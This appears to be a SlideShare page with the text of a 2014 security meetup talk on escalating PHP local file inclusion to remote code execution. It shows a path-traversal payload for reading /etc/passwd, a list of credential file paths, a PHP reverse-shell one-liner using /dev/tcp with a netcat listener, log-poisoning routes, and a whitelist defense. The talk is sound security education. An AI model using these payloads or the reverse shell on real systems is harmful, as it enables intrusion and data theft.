Local File Inclusion to Remote Code Execution
•
6 recomendaciones•11,201 vistas
null Bangalore Chapter - March 2014 Meet
![Local File Inclusion To Remote
Command Execution [LFI <> RCE]
By
Sharath Unni](https://image.slidesharecdn.com/lfitorce-140407115128-phpapp02/85/Local-File-Inclusion-to-Remote-Code-Execution-1-320.jpg)
Recomendados
Más contenido relacionado
La actualidad más candente
La actualidad más candente (20)
Destacado
Destacado (20)
Similar a Local File Inclusion to Remote Code Execution
Similar a Local File Inclusion to Remote Code Execution (20)
Más de n|u - The Open Security Community
Más de n|u - The Open Security Community (20)
Último
Último (20)
Local File Inclusion to Remote Code Execution
- 1. Local File Inclusion To Remote Command Execution [LFI <> RCE] By Sharath Unni
- 2. Introduction What is a file inclusion vulnerability? How the attack works? RFI/LFI vulnerable PHP functions Traverse and read local files PathTraversal / FI using scanners Reverse shell via LFI Other ways to inject your code Defending yourself
- 3. What is a file inclusion vulnerability? Input validation The application trusts/doesn’t validate the user input The code includes/imports other pages Dynamic including of the page When PHP includes a file it will parse any PHP code within that file (“<?php” and “?>”) Do not trust the user…ever !!
- 4. How the attack works? http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include The code would be: <?php $file =$_GET[‘file']; include("/".$file .".php"); <--Vulnerable !! ?> Assign page to "../../../../etc/passwd%00“ <?php $file =$_GET[‘file']; include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?> %00 (Null CHAR) will ignore everything that comes after %00 ../../../ will traverse path to root and goto /etc/passwd
- 5. RFI/LFI vulnerable PHP functions include() include_once() require() require_once() fopen()
- 6. Common locations Normally, the following files are read: /etc/passwd /etc/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/httpd/conf/httpd.conf Other Unix common locations
- 7. Path Traversal / FI using scanners http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
- 8. We read the files, what next?
- 9. Reverse shell via LFI PHP script to open an outbound TCP connection <?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?> Go and catch the reverse shell nc –lp <port>
- 10. Other ways to inject your code Using directory traversal to read files Log poisoning (access.log, error.log) Session variables Uploaded files Emails Shared hosting FTP and other logs
- 11. Defending yourself <?php $page_files=array( 'about'=>'about.html', 'photos'=>'photos.html', 'contact'=>'contact.html', 'home'=>'home.html' ); if (in_array($_GET['page'],array_keys($page_files))) { include $page_files[$_GET['page']]; } else { include $page_files['home']; } ?>
- 12. Thank You!